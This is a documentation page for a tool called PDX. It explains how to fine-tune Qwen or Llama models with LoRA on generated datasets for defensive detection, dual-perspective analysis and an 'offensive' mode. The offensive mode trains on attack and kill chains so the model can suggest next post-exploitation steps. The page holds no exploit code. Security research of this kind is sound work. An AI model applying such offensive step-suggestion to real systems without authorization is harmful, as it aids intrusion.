Skip to content

Fine-tuning

PDX generates training datasets that can be used to fine-tune LLMs for cybersecurity tasks — both defensive (detection, alerting) and offensive (pentest assistance, TTP reconstruction).

Requirements

Resource Minimum Recommended
GPU VRAM 8 GB 16 GB+
RAM 16 GB 32 GB
Disk 20 GB 50 GB
Framework Unsloth Unsloth

Supported base models

Model Size Best for
Qwen 2.5 7B / 14B Fast iteration, good multilingual
Llama 3.3 8B / 70B English-focused, strong reasoning

Quick fine-tune

python training/finetune_pdx.py \
  --dataset training_output/data_router/defensive/sft_detection_patterns.jsonl \
  --model qwen \
  --epochs 3 \
  --rank 16

Options

Flag Default Description
--dataset Path to JSONL training data
--model qwen Base model (qwen or llama)
--epochs 3 Training epochs
--rank 16 LoRA rank (higher = more capacity, more VRAM)
--resume false Resume from checkpoint

Training a defensive model

# Generate defensive datasets first
python -m pdx.training.data_router generate --defensive

# Train on detection patterns
python training/finetune_pdx.py \
  --dataset training_output/data_router/defensive/sft_detection_patterns.jsonl \
  --model qwen --epochs 5 --rank 16

# Train on lure effectiveness (DPO)
python training/finetune_pdx.py \
  --dataset training_output/data_router/defensive/dpo_lure_quality.jsonl \
  --model qwen --epochs 3 --rank 16

After training, the model can:

  • Identify MITRE ATT&CK tactics from SSH command sequences
  • Score the threat level of observed commands
  • Evaluate which persona configurations are most effective

Training an offensive model

# Generate offensive datasets first
python -m pdx.training.data_router generate --offensive

# Train on attack chains
python training/finetune_pdx.py \
  --dataset training_output/data_router/offensive/sft_attack_chains.jsonl \
  --model llama --epochs 5 --rank 32

# Train on kill chains (RAFT)
python training/finetune_pdx.py \
  --dataset training_output/data_router/offensive/raft_kill_chains.jsonl \
  --model llama --epochs 3 --rank 32

After training, the model can:

  • Reconstruct post-exploitation sequences from partial observations
  • Suggest next steps in a pentest based on current position
  • Map observed commands to MITRE ATT&CK techniques

Training a dual-perspective model

# Generate combined datasets
python -m pdx.training.data_router generate --combined

# Train on dual-perspective analysis
python training/finetune_pdx.py \
  --dataset training_output/data_router/combined/react_dual_perspective.jsonl \
  --model qwen --epochs 5 --rank 32

This produces a model that can analyze the same command sequence from both offensive and defensive perspectives — the most unique output of the PDX pipeline.

VRAM management

The fine-tuning script includes automatic VRAM safety checks:

[VRAM] Total: 15.8 GB | Used: 2.1 GB | Free: 13.7 GB
[VRAM] Estimated requirement for Qwen-7B + LoRA rank 16: ~6 GB
[VRAM] Status: OK — proceeding

If Ollama is running, the script will warn you — Ollama and fine-tuning compete for VRAM.

For limited VRAM (8GB)

Use --rank 8 and --model qwen (7B). This fits in 6GB VRAM with room for the training batch.